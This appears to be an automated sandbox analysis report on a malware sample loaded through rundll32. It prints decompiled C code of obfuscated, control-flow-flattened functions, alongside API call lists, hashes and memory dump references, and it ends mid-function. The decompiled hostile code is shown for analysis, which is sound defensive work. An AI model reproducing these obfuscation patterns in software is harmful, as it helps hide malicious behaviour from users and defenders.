                                                                                                                      0x00689abb
                                                                                                                      0x00689ac1
                                                                                                                      0x00689a55
                                                                                                                      0x00689a55
                                                                                                                      0x00689a55
                                                                                                                      0x00000000
                                                                                                                      0x00689a55
                                                                                                                      0x00689a55
                                                                                                                      0x00689abb
                                                                                                                      0x00689a84
                                                                                                                      0x00689b82
                                                                                                                      0x00689b82
                                                                                                                      0x00689b52
                                                                                                                      0x00689b57
                                                                                                                      0x00689b57
                                                                                                                      0x00689b57
                                                                                                                      0x00000000
                                                                                                                      0x00689a5a

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $2$'|6$3`S$8$8pM$>yhM$DT%1$k l$kE3Q$pj$q
                                                                                                                      • API String ID: 0-1622084174
                                                                                                                      • Opcode ID: 06b1d89eb1fb5c02428d23ad844c433b2f798627b3f772edd869af1620a57b8d
                                                                                                                      • Instruction ID: 6087d8c41e1bc7995b9ff3791a3d3573ee176cefd44904a1beac503852301865
                                                                                                                      • Opcode Fuzzy Hash: 06b1d89eb1fb5c02428d23ad844c433b2f798627b3f772edd869af1620a57b8d
                                                                                                                      • Instruction Fuzzy Hash: A5B140729083419FC398DF25C58A40BFBF2BBC4758F008A1DF59A96220D3B5D95ACF86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 006864E2 Relevance: 12.9, Strings: 10, Instructions: 358COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E006864E2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v260;
				signed int _v264;
				intOrPtr _v268;
				char _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				void* _t311;
				void* _t332;
				intOrPtr _t335;
				intOrPtr _t338;
				intOrPtr _t343;
				void* _t345;
				void* _t347;
				void* _t349;
				void* _t352;
				intOrPtr _t359;
				intOrPtr _t361;
				intOrPtr* _t362;
				intOrPtr _t364;
				signed int _t367;
				intOrPtr _t386;
				intOrPtr _t387;
				intOrPtr _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				void* _t423;
				signed int* _t425;
				void* _t427;

				_push(_a24);
				_t423 = __edx;
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006920B9(_t311);
				_v264 = _v264 & 0x00000000;
				_t425 =  &(( &_v412)[8]);
				_v268 = 0x38f10b;
				_v376 = 0x1d6e4;
				_t364 = 0;
				_v376 = _v376 + 0x2cf5;
				_t367 = 0x349a1a2;
				_v376 = _v376 + 0xffffbc4f;
				_v376 = _v376 + 0xc828;
				_v376 = _v376 ^ 0x000c4abe;
				_v344 = 0xf0b614;
				_t415 = 0x49;
				_v344 = _v344 / _t415;
				_v344 = _v344 ^ 0x0006b22b;
				_v296 = 0xc48c2;
				_v296 = _v296 >> 0xa;
				_v296 = _v296 ^ 0x0001ad51;
				_v384 = 0x7feda9;
				_t416 = 0x39;
				_v384 = _v384 * 0x1a;
				_v384 = _v384 ^ 0x3da8c069;
				_v384 = _v384 + 0xffff691b;
				_v384 = _v384 ^ 0x315a0b75;
				_v400 = 0x77d138;
				_v400 = _v400 + 0xffff5a87;
				_v400 = _v400 << 3;
				_v400 = _v400 + 0xffff9ef2;
				_v400 = _v400 ^ 0x03bdd381;
				_v312 = 0x267902;
				_v312 = _v312 | 0xf93e454e;
				_v312 = _v312 ^ 0xf93fe769;
				_v308 = 0x6d5338;
				_v308 = _v308 ^ 0x3f4c4be5;
				_v308 = _v308 ^ 0x3f211e75;
				_v328 = 0x5e1da9;
				_v328 = _v328 / _t416;
				_v328 = _v328 ^ 0x000cc368;
				_v364 = 0xd2dbf2;
				_v364 = _v364 + 0xffffefaa;
				_v364 = _v364 + 0xd543;
				_v364 = _v364 ^ 0x00d6d9fb;
				_v304 = 0x235f1e;
				_t417 = 0x2e;
				_v304 = _v304 / _t417;
				_v304 = _v304 ^ 0x000b3ded;
				_v320 = 0xc8231f;
				_v320 = _v320 << 0xc;
				_v320 = _v320 ^ 0x8237c00a;
				_v356 = 0xee2c9b;
				_v356 = _v356 ^ 0xa0da06c4;
				_v356 = _v356 ^ 0xf246f640;
				_v356 = _v356 ^ 0x52703357;
				_v412 = 0xc100a3;
				_v412 = _v412 ^ 0xb8e7c080;
				_v412 = _v412 ^ 0xb6721a67;
				_v412 = _v412 ^ 0xff44de7f;
				_v412 = _v412 ^ 0xf11e2702;
				_v396 = 0xa6af25;
				_v396 = _v396 << 0x10;
				_v396 = _v396 >> 7;
				_v396 = _v396 + 0xffff7054;
				_v396 = _v396 ^ 0x015ec427;
				_v404 = 0x1f48c8;
				_t418 = 0x2d;
				_v404 = _v404 / _t418;
				_v404 = _v404 << 0xb;
				_v404 = _v404 | 0x7455ca98;
				_v404 = _v404 ^ 0x75da0b0a;
				_v368 = 0x174318;
				_v368 = _v368 + 0x805d;
				_v368 = _v368 ^ 0x0012ca04;
				_v408 = 0x579c92;
				_t419 = 0x65;
				_v408 = _v408 * 0x61;
				_v408 = _v408 ^ 0x6a2d4e62;
				_v408 = _v408 + 0xd9d0;
				_v408 = _v408 ^ 0x4b1c9053;
				_v392 = 0x2598b2;
				_v392 = _v392 * 0xd;
				_v392 = _v392 ^ 0xb79fc0d8;
				_v392 = _v392 + 0xffff9085;
				_v392 = _v392 ^ 0xb671271d;
				_v324 = 0x8734;
				_v324 = _v324 + 0xffff82f4;
				_v324 = _v324 ^ 0x000c0e93;
				_v332 = 0x81f499;
				_v332 = _v332 ^ 0xcb023f28;
				_v332 = _v332 ^ 0xcb8aeffa;
				_v340 = 0xbb3951;
				_v340 = _v340 ^ 0x050a1ed9;
				_v340 = _v340 ^ 0x05b74055;
				_v372 = 0x5c4d3f;
				_v372 = _v372 + 0xffffba18;
				_v372 = _v372 | 0xc0b40c25;
				_v372 = _v372 >> 3;
				_v372 = _v372 ^ 0x1815f0ae;
				_v380 = 0xe44e59;
				_v380 = _v380 + 0x7d25;
				_v380 = _v380 + 0xffff00c0;
				_v380 = _v380 << 0xa;
				_v380 = _v380 ^ 0x8f30862d;
				_v360 = 0x1cbdf;
				_v360 = _v360 + 0xffff6e4b;
				_v360 = _v360 >> 8;
				_v360 = _v360 ^ 0x0001cec6;
				_v348 = 0xf4499d;
				_v348 = _v348 + 0x832d;
				_v348 = _v348 << 2;
				_v348 = _v348 ^ 0x03dc7480;
				_v352 = 0x4c1d4a;
				_v352 = _v352 >> 0xd;
				_v352 = _v352 * 0xe;
				_v352 = _v352 ^ 0x0003e302;
				_v388 = 0x7e89b7;
				_v388 = _v388 / _t419;
				_t420 = 0x48;
				_v388 = _v388 / _t420;
				_t421 = 0x2b;
				_t414 = _v368;
				_v388 = _v388 / _t421;
				_v388 = _v388 ^ 0x000ed69e;
				_t422 = _v368;
				_v300 = 0xe9da01;
				_v300 = _v300 + 0xffffd878;
				_v300 = _v300 ^ 0x00eb5be0;
				_v336 = 0x6aaf6d;
				_v336 = _v336 * 0x22;
				_v336 = _v336 ^ 0x0e2b42a4;
				_v316 = 0x54d710;
				_v316 = _v316 >> 0xc;
				_v316 = _v316 ^ 0x0000014d;
				while(1) {
					L1:
					_t332 = 0x61250f6;
					do {
						while(1) {
							L2:
							_t427 = _t367 - _t332;
							if(_t427 > 0) {
								break;
							}
							if(_t427 == 0) {
								_t352 = E00690AE0(0x40, 1);
								_push(_v320);
								_push( &_v260);
								_push(_t352);
								_push(0xb);
								E006880E3(_v364, _v304);
								_t425 =  &(_t425[6]);
								_t367 = 0x97954ea;
								while(1) {
									L1:
									_t332 = 0x61250f6;
									goto L2;
								}
							}
							if(_t367 == 0x2db8754) {
								E00698519(_v360, _v348, _v292);
								E00698519(_v352, _v388, _t422);
								E00698519(_v300, _v336, _v284);
								_t367 = _t414;
								L33:
								_t332 = 0x61250f6;
								goto L34;
							}
							if(_t367 == 0x349a1a2) {
								_t422 = 0;
								E00684B61( &_v260, 0x100, _v376, _v344);
								_v284 = _v284 & 0;
								_v280 = _v280 & 0;
								_v292 = _v292 & 0;
								_v288 = _v288 & 0;
								_t367 = 0xea9523f;
								while(1) {
									L1:
									_t332 = 0x61250f6;
									goto L2;
								}
							}
							if(_t367 == 0x47b49b8) {
								if(_v288 >= _v316) {
									_t359 = E0069F435( &_v292,  &_v284);
								} else {
									_t359 = E0069A666( &_v292);
								}
								_t422 = _t359;
								_t332 = 0x61250f6;
								_t367 =  !=  ? 0x61250f6 : 0x2db8754;
								continue;
							}
							if(_t367 != 0x54d1846) {
								goto L34;
							}
							_t386 =  *0x6a3e08; // 0x0
							_t361 =  *((intOrPtr*)( *((intOrPtr*)(_t386 + 4))));
							 *((intOrPtr*)(_t386 + 0x14)) =  *((intOrPtr*)(_t386 + 0x14)) + 1;
							_t413 =  *((intOrPtr*)(_t386 + 0x14));
							 *((intOrPtr*)(_t386 + 4)) = _t361;
							if(_t361 == 0) {
								 *((intOrPtr*)(_t386 + 4)) =  *((intOrPtr*)(_t386 + 0x20));
							}
							_t362 =  *0x6a3e08; // 0x0
							if(_t413 >=  *_t362) {
								_t387 =  *0x6a3e08; // 0x0
								 *(_t387 + 0x14) =  *(_t387 + 0x14) & 0x00000000;
								L37:
								return _t364;
							} else {
								_t367 = 0x349a1a2;
								while(1) {
									L1:
									_t332 = 0x61250f6;
									goto L2;
								}
							}
						}
						if(_t367 == 0x70f4b52) {
							E00698519(_v372, _v380, _v276);
							_t367 = 0x2db8754;
							goto L33;
						}
						if(_t367 == 0x97954ea) {
							_t335 =  *0x6a3e08; // 0x0
							_t338 =  *0x6a3e08; // 0x0
							_t343 =  *0x6a3e08; // 0x0
							_t345 = E0069E395( *((intOrPtr*)( *((intOrPtr*)(_t343 + 4)) + 0x1a)),  &_v284,  &_v276, _v356, _v412,  &_v260, _v396, _t422, _v404, _v368,  *((intOrPtr*)(_t338 + 4)) + 0x1c, _v408,  *( *((intOrPtr*)(_t335 + 4)) + 0x18) & 0x0000ffff);
							_t425 =  &(_t425[0xb]);
							if(_t345 == 0) {
								_t414 = 0x54d1846;
								_t367 = 0x2db8754;
							} else {
								_t367 = 0xcdb2e90;
							}
							while(1) {
								L1:
								_t332 = 0x61250f6;
								goto L2;
							}
						}
						if(_t367 == 0xcdb2e90) {
							_t347 = E00685548(_v324, _a24, _v332, _v340,  &_v276);
							_t425 =  &(_t425[4]);
							if(_t347 == 0) {
								_t414 = 0x54d1846;
							} else {
								_t414 = 0xa80516a;
								_t364 = 1;
							}
							_t367 = 0x70f4b52;
							while(1) {
								L1:
								_t332 = 0x61250f6;
								goto L2;
							}
						}
						if(_t367 != 0xea9523f) {
							goto L34;
						}
						_t349 = E0068CF47(_v296, _v384, _t423,  &_v292, _v400, _a8, _v312);
						_t425 =  &(_t425[5]);
						if(_t349 == 0) {
							goto L37;
						}
						_t367 = 0x47b49b8;
						goto L1;
						L34:
					} while (_t367 != 0xa80516a);
					goto L37;
				}
			}






































































                                                                                                                      0x006864ec
                                                                                                                      0x006864f3
                                                                                                                      0x006864f5
                                                                                                                      0x006864fc
                                                                                                                      0x00686503
                                                                                                                      0x0068650a
                                                                                                                      0x00686511
                                                                                                                      0x00686518
                                                                                                                      0x00686519
                                                                                                                      0x0068651a
                                                                                                                      0x0068651f
                                                                                                                      0x00686527
                                                                                                                      0x0068652a
                                                                                                                      0x00686537
                                                                                                                      0x0068653f
                                                                                                                      0x00686541
                                                                                                                      0x00686549
                                                                                                                      0x0068654e
                                                                                                                      0x00686556
                                                                                                                      0x0068655e
                                                                                                                      0x00686566
                                                                                                                      0x00686574
                                                                                                                      0x00686579
                                                                                                                      0x0068657f
                                                                                                                      0x00686587
                                                                                                                      0x00686592
                                                                                                                      0x0068659a
                                                                                                                      0x006865a5
                                                                                                                      0x006865b2
                                                                                                                      0x006865b5
                                                                                                                      0x006865b9
                                                                                                                      0x006865c1
                                                                                                                      0x006865c9
                                                                                                                      0x006865d1
                                                                                                                      0x006865d9
                                                                                                                      0x006865e1
                                                                                                                      0x006865e6
                                                                                                                      0x006865ee
                                                                                                                      0x006865f6
                                                                                                                      0x006865fe
                                                                                                                      0x00686606
                                                                                                                      0x0068660e
                                                                                                                      0x00686616
                                                                                                                      0x0068661e
                                                                                                                      0x00686626
                                                                                                                      0x00686636
                                                                                                                      0x0068663a
                                                                                                                      0x00686642
                                                                                                                      0x0068664a
                                                                                                                      0x00686652
                                                                                                                      0x0068665a
                                                                                                                      0x00686662
                                                                                                                      0x00686674
                                                                                                                      0x00686677
                                                                                                                      0x0068667b
                                                                                                                      0x00686683
                                                                                                                      0x0068668b
                                                                                                                      0x00686690
                                                                                                                      0x00686698
                                                                                                                      0x006866a0
                                                                                                                      0x006866a8
                                                                                                                      0x006866b0
                                                                                                                      0x006866b8
                                                                                                                      0x006866c0
                                                                                                                      0x006866c8
                                                                                                                      0x006866d2
                                                                                                                      0x006866da
                                                                                                                      0x006866e2
                                                                                                                      0x006866ea
                                                                                                                      0x006866ef
                                                                                                                      0x006866f4
                                                                                                                      0x006866fc
                                                                                                                      0x00686704
                                                                                                                      0x00686712
                                                                                                                      0x00686717
                                                                                                                      0x0068671d
                                                                                                                      0x00686722
                                                                                                                      0x0068672a
                                                                                                                      0x00686732
                                                                                                                      0x0068673a
                                                                                                                      0x00686742
                                                                                                                      0x0068674a
                                                                                                                      0x00686757
                                                                                                                      0x0068675a
                                                                                                                      0x0068675e
                                                                                                                      0x00686766
                                                                                                                      0x0068676e
                                                                                                                      0x00686776
                                                                                                                      0x00686783
                                                                                                                      0x00686787
                                                                                                                      0x0068678f
                                                                                                                      0x00686797
                                                                                                                      0x0068679f
                                                                                                                      0x006867a7
                                                                                                                      0x006867af
                                                                                                                      0x006867b7
                                                                                                                      0x006867bf
                                                                                                                      0x006867c7
                                                                                                                      0x006867cf
                                                                                                                      0x006867d7
                                                                                                                      0x006867df
                                                                                                                      0x006867e7
                                                                                                                      0x006867ef
                                                                                                                      0x006867f7
                                                                                                                      0x006867ff
                                                                                                                      0x00686804
                                                                                                                      0x0068680c
                                                                                                                      0x00686814
                                                                                                                      0x0068681c
                                                                                                                      0x00686824
                                                                                                                      0x00686829
                                                                                                                      0x00686831
                                                                                                                      0x00686839
                                                                                                                      0x00686841
                                                                                                                      0x00686846
                                                                                                                      0x0068684e
                                                                                                                      0x00686856
                                                                                                                      0x0068685e
                                                                                                                      0x00686863
                                                                                                                      0x0068686b
                                                                                                                      0x00686873
                                                                                                                      0x0068687d
                                                                                                                      0x00686881
                                                                                                                      0x00686889
                                                                                                                      0x00686899
                                                                                                                      0x006868a1
                                                                                                                      0x006868a6
                                                                                                                      0x006868b0
                                                                                                                      0x006868b3
                                                                                                                      0x006868b7
                                                                                                                      0x006868bb
                                                                                                                      0x006868c3
                                                                                                                      0x006868c7
                                                                                                                      0x006868d2
                                                                                                                      0x006868dd
                                                                                                                      0x006868e8
                                                                                                                      0x006868f5
                                                                                                                      0x006868f9
                                                                                                                      0x00686901
                                                                                                                      0x00686909
                                                                                                                      0x0068690e
                                                                                                                      0x00686916
                                                                                                                      0x00686916
                                                                                                                      0x00686916
                                                                                                                      0x0068691b
                                                                                                                      0x0068691b
                                                                                                                      0x0068691b
                                                                                                                      0x0068691b
                                                                                                                      0x0068691d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00686923
                                                                                                                      0x00686a56
                                                                                                                      0x00686a5b
                                                                                                                      0x00686a6d
                                                                                                                      0x00686a72
                                                                                                                      0x00686a73
                                                                                                                      0x00686a75
                                                                                                                      0x00686a7a
                                                                                                                      0x00686a7d
                                                                                                                      0x00686916
                                                                                                                      0x00686916
                                                                                                                      0x00686916
                                                                                                                      0x00000000
                                                                                                                      0x00686916
                                                                                                                      0x00686916
                                                                                                                      0x0068692f
                                                                                                                      0x00686a16
                                                                                                                      0x00686a25
                                                                                                                      0x00686a3d
                                                                                                                      0x00686a43
                                                                                                                      0x00686bc8
                                                                                                                      0x00686bc8
                                                                                                                      0x00000000
                                                                                                                      0x00686bc8
                                                                                                                      0x0068693b
                                                                                                                      0x006869d8
                                                                                                                      0x006869da
                                                                                                                      0x006869df
                                                                                                                      0x006869e6
                                                                                                                      0x006869ed
                                                                                                                      0x006869f4
                                                                                                                      0x006869fd
                                                                                                                      0x00686916
                                                                                                                      0x00686916
                                                                                                                      0x00686916
                                                                                                                      0x00000000
                                                                                                                      0x00686916
                                                                                                                      0x00686916
                                                                                                                      0x00686947
                                                                                                                      0x00686999
                                                                                                                      0x006869a9
                                                                                                                      0x0068699b
                                                                                                                      0x0068699b
                                                                                                                      0x0068699b
                                                                                                                      0x006869ae
                                                                                                                      0x006869b7
                                                                                                                      0x006869bc
                                                                                                                      0x00000000
                                                                                                                      0x006869bc
                                                                                                                      0x0068694f
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00686955
                                                                                                                      0x0068695e
                                                                                                                      0x00686960
                                                                                                                      0x00686963
                                                                                                                      0x00686966
                                                                                                                      0x0068696b
                                                                                                                      0x00686970
                                                                                                                      0x00686970
                                                                                                                      0x00686973
                                                                                                                      0x0068697a
                                                                                                                      0x00686bdb
                                                                                                                      0x00686be1
                                                                                                                      0x00686be8
                                                                                                                      0x00686bf1
                                                                                                                      0x00686980
                                                                                                                      0x00686980
                                                                                                                      0x00686916
                                                                                                                      0x00686916
                                                                                                                      0x00686916
                                                                                                                      0x00000000
                                                                                                                      0x00686916
                                                                                                                      0x00686916
                                                                                                                      0x0068697a
                                                                                                                      0x00686a8d
                                                                                                                      0x00686bbd
                                                                                                                      0x00686bc3
                                                                                                                      0x00000000
                                                                                                                      0x00686bc3
                                                                                                                      0x00686a99
                                                                                                                      0x00686b34
                                                                                                                      0x00686b4c
                                                                                                                      0x00686b7d
                                                                                                                      0x00686b89
                                                                                                                      0x00686b8e
                                                                                                                      0x00686b93
                                                                                                                      0x00686b9f
                                                                                                                      0x00686ba4
                                                                                                                      0x00686b95
                                                                                                                      0x00686b95
                                                                                                                      0x00686b95
                                                                                                                      0x00686916
                                                                                                                      0x00686916
                                                                                                                      0x00686916
                                                                                                                      0x00000000
                                                                                                                      0x00686916
                                                                                                                      0x00686916
                                                                                                                      0x00686aa5
                                                                                                                      0x00686b0f
                                                                                                                      0x00686b14
                                                                                                                      0x00686b19
                                                                                                                      0x00686b25
                                                                                                                      0x00686b1b
                                                                                                                      0x00686b1d
                                                                                                                      0x00686b22
                                                                                                                      0x00686b22
                                                                                                                      0x00686b2a
                                                                                                                      0x00686916
                                                                                                                      0x00686916
                                                                                                                      0x00686916
                                                                                                                      0x00000000
                                                                                                                      0x00686916
                                                                                                                      0x00686916
                                                                                                                      0x00686aad
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00686ad6
                                                                                                                      0x00686adb
                                                                                                                      0x00686ae0
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00686ae6
                                                                                                                      0x00000000
                                                                                                                      0x00686bcd
                                                                                                                      0x00686bcd
                                                                                                                      0x00000000
                                                                                                                      0x00686bd9

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %}$?M\$W3pR$YN$bN-j$KL?$Ty$Ty$[$[
                                                                                                                      • API String ID: 0-2895984816
                                                                                                                      • Opcode ID: 00bd626cfd7b9d7f381bb233a094662793ed5db2f6d4824226ee4a7bac8140a9
                                                                                                                      • Instruction ID: 241f313926b4e872476352d0ee0cef08e55cecd4ec62ebf9dffa3bb992bb18d1
                                                                                                                      • Opcode Fuzzy Hash: 00bd626cfd7b9d7f381bb233a094662793ed5db2f6d4824226ee4a7bac8140a9
                                                                                                                      • Instruction Fuzzy Hash: D30256715083819FC7A8DF65C585A5BBBE2FBC4318F208A0DF5DA86260C7B4D949CF46
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10021854 Relevance: 12.1, APIs: 8, Instructions: 129filestringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10021873
                                                                                                                      • GetFullPathNameA.KERNEL32(?,00000104,?,?,00000014), ref: 100218B4
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • PathIsUNCA.SHLWAPI(?), ref: 100218FE
                                                                                                                      • GetVolumeInformationA.KERNEL32 ref: 1002191C
                                                                                                                      • CharUpperA.USER32 ref: 10021943
                                                                                                                      • FindFirstFileA.KERNEL32(?,00000000), ref: 10021954
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 10021960
                                                                                                                      • lstrlenA.KERNEL32(?), ref: 10021975
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3InformationNameThrowUpperVolumelstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3249967234-0
                                                                                                                      • Opcode ID: eb490681b6d568b073a389bcc3f25b73e071b185c17e64a21006f2b4c6435a32
                                                                                                                      • Instruction ID: 60a4613adf5c573b6f7ecf717c69f11d5bc108e5d701f0798ce0fed1b7752ca1
                                                                                                                      • Opcode Fuzzy Hash: eb490681b6d568b073a389bcc3f25b73e071b185c17e64a21006f2b4c6435a32
                                                                                                                      • Instruction Fuzzy Hash: 0E41DF7990024AAFEB11DFB4DC95AFF77BCEF14355F800529F815E2192EB30A944CA61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00685E60 Relevance: 11.6, Strings: 9, Instructions: 323COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E00685E60(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				void* _t339;
				intOrPtr _t372;
				void* _t374;
				intOrPtr _t381;
				intOrPtr _t382;
				void* _t384;
				intOrPtr* _t385;
				void* _t387;
				intOrPtr _t421;
				intOrPtr* _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int* _t437;

				_t385 = _a8;
				_push(_t385);
				_push(_a4);
				_t423 = __ecx;
				_push(__edx);
				_push(__ecx);
				E006920B9(_t339);
				_v12 = 0xbcdf6a;
				_t437 =  &(( &_v148)[4]);
				_t421 = 0;
				_v8 = 0;
				_t387 = 0xc04f77e;
				_v92 = 0x11f6ef;
				_v92 = _v92 + 0xffffb184;
				_t424 = 0x71;
				_v92 = _v92 / _t424;
				_t425 = 0x24;
				_v92 = _v92 / _t425;
				_v92 = _v92 ^ 0x0000011d;
				_v56 = 0xfaa796;
				_v56 = _v56 >> 0xc;
				_v56 = _v56 << 0xa;
				_v56 = _v56 ^ 0x003ea801;
				_v36 = 0x1650e4;
				_v36 = _v36 + 0xce7;
				_v36 = _v36 ^ 0x00165dcb;
				_v116 = 0x54bb44;
				_v116 = _v116 + 0xffff1cdd;
				_v116 = _v116 + 0xffffa99d;
				_v116 = _v116 + 0xa8e5;
				_v116 = _v116 ^ 0x00542aa3;
				_v148 = 0xce1ee6;
				_v148 = _v148 ^ 0xff8bbe67;
				_v148 = _v148 | 0x521cb43f;
				_v148 = _v148 << 1;
				_v148 = _v148 ^ 0xfebb697e;
				_v52 = 0xc2bf1c;
				_v52 = _v52 << 0xc;
				_t426 = 0x73;
				_v52 = _v52 / _t426;
				_v52 = _v52 ^ 0x0061d2eb;
				_v88 = 0x8d6fba;
				_v88 = _v88 * 0x6a;
				_v88 = _v88 * 0x21;
				_v88 = _v88 >> 0xb;
				_v88 = _v88 ^ 0x00119314;
				_v48 = 0xec8dbc;
				_v48 = _v48 + 0xffff0a61;
				_v48 = _v48 | 0x0a9d8147;
				_v48 = _v48 ^ 0x0affcc17;
				_v24 = 0xd16d2c;
				_v24 = _v24 >> 2;
				_v24 = _v24 ^ 0x003dd5e6;
				_v124 = 0xaffa28;
				_v124 = _v124 >> 9;
				_v124 = _v124 * 9;
				_v124 = _v124 ^ 0x3775f33c;
				_v124 = _v124 ^ 0x377a4e54;
				_v76 = 0x9eb952;
				_v76 = _v76 >> 0xd;
				_v76 = _v76 << 0xa;
				_v76 = _v76 ^ 0x00160abd;
				_v108 = 0x8bec79;
				_t427 = 0x28;
				_v108 = _v108 * 0x30;
				_v108 = _v108 + 0xffff86d5;
				_v108 = _v108 + 0xffff5405;
				_v108 = _v108 ^ 0x1a3a719b;
				_v132 = 0x74267e;
				_v132 = _v132 + 0x1b76;
				_v132 = _v132 << 4;
				_v132 = _v132 + 0xffff1414;
				_v132 = _v132 ^ 0x074c11a2;
				_v100 = 0x4236e1;
				_v100 = _v100 ^ 0x96e608d5;
				_v100 = _v100 / _t427;
				_t428 = 0x2d;
				_v100 = _v100 * 0x6c;
				_v100 = _v100 ^ 0x96bd808a;
				_v84 = 0xb83730;
				_v84 = _v84 + 0xffffd15d;
				_v84 = _v84 >> 0xb;
				_v84 = _v84 ^ 0x0009ec33;
				_v140 = 0x532b06;
				_v140 = _v140 ^ 0xb0124270;
				_v140 = _v140 << 1;
				_v140 = _v140 / _t428;
				_v140 = _v140 ^ 0x02279f8d;
				_v44 = 0x33dfa;
				_v44 = _v44 + 0x1c37;
				_v44 = _v44 ^ 0x000817ba;
				_v136 = 0x1bf887;
				_v136 = _v136 ^ 0x189cf430;
				_v136 = _v136 + 0xffff0896;
				_v136 = _v136 ^ 0xf213b32f;
				_v136 = _v136 ^ 0xea9313b1;
				_v144 = 0xffa314;
				_v144 = _v144 >> 7;
				_v144 = _v144 ^ 0x35f9e2de;
				_t429 = 0x1f;
				_v144 = _v144 * 0x5b;
				_v144 = _v144 ^ 0x2f3e99d8;
				_v68 = 0x41f910;
				_v68 = _v68 / _t429;
				_v68 = _v68 ^ 0x28681de5;
				_v68 = _v68 ^ 0x2865ac71;
				_v96 = 0x6e33;
				_v96 = _v96 << 4;
				_v96 = _v96 ^ 0xe7b8475a;
				_v96 = _v96 << 1;
				_v96 = _v96 ^ 0xcf7b3a2b;
				_v104 = 0xedfca3;
				_t430 = 0x5e;
				_v104 = _v104 * 0x5f;
				_v104 = _v104 | 0x0b07679d;
